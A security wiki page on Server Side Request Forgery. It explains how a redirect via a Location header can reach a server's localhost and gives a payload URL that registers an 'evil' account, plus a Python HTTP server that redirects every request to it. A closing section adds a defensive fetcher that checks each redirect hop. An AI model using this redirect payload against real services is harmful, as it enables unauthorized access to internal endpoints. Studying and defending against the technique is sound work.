Server Side Request Forgery

Perform actions on the server's behalf


Last updated 3 years ago


Bypasses

Localhost

Using the Location header to perform a redirect to 127.0.0.1

Because a redirect's Location header can carry query parameters, a link that redirects to localhost works if you're lucky enough to have a function that accepts query parameters, follows redirects and does not block connections to the internet.

If the target does not block connections to the internet, you can use bitly for this purpose; otherwise it is also possible to set up your own HTTP server and implement the redirect via the Location header.

Payload

http://127.0.0.1/register?username=evil&password=evilpass&confirm=evilpass

Implementation via own http server

from http.server import HTTPServer, BaseHTTPRequestHandler


class pyhandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every GET with a permanent redirect to the localhost payload
        self.send_response(301)
        self.send_header(
            'Location',
            'http://127.0.0.1/register?username=evil&password=evilpass&confirm=evilpass')
        self.end_headers()


class pyhttp(object):
    def __init__(self, server_class=HTTPServer,
                 handler_class=pyhandler):
        # Listen on all interfaces, port 80 (ports below 1024 usually need elevated privileges)
        self.address = server_address = ('', 80)
        self.httpd = server_class(server_address, handler_class)
        # Blocks here and serves requests until the process is stopped
        self.httpd.serve_forever()


pyhttp()
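
The redirect trick above only works when the fetching function follows a Location header without checking where it points. The following is an added example, not code from the original page, of a fetcher that re-validates every redirect hop; the names assert_public, CheckedRedirects and safe_fetch are hypothetical.

```python
import ipaddress
import socket
import urllib.request
from urllib.parse import urlsplit


class BlockedDestination(Exception):
    """Raised when a URL or redirect target resolves to a non-public address."""


def assert_public(url):
    """Resolve the URL's host and reject loopback, private and similar ranges."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise BlockedDestination(f"unsupported URL: {url}")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    # Check every address the name resolves to, not just the first one.
    for info in socket.getaddrinfo(parts.hostname, port, type=socket.SOCK_STREAM):
        ip = ipaddress.ip_address(info[4][0])
        if not ip.is_global:
            raise BlockedDestination(f"{url} resolves to non-public {ip}")
    return url


class CheckedRedirects(urllib.request.HTTPRedirectHandler):
    """Re-validate every Location target before urllib follows it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        assert_public(newurl)  # a 301 to 127.0.0.1 stops here
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def safe_fetch(url, timeout=5):
    """Fetch a user-supplied URL, validating the first hop and each redirect."""
    assert_public(url)
    # Passing the subclass replaces urllib's default redirect handler.
    opener = urllib.request.build_opener(CheckedRedirects)
    with opener.open(url, timeout=timeout) as resp:
        return resp.read()
```

The check resolves the name separately from the connection that follows, so it does not cover a host whose DNS answer changes between the two lookups; pinning the validated address for the connection closes that gap.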
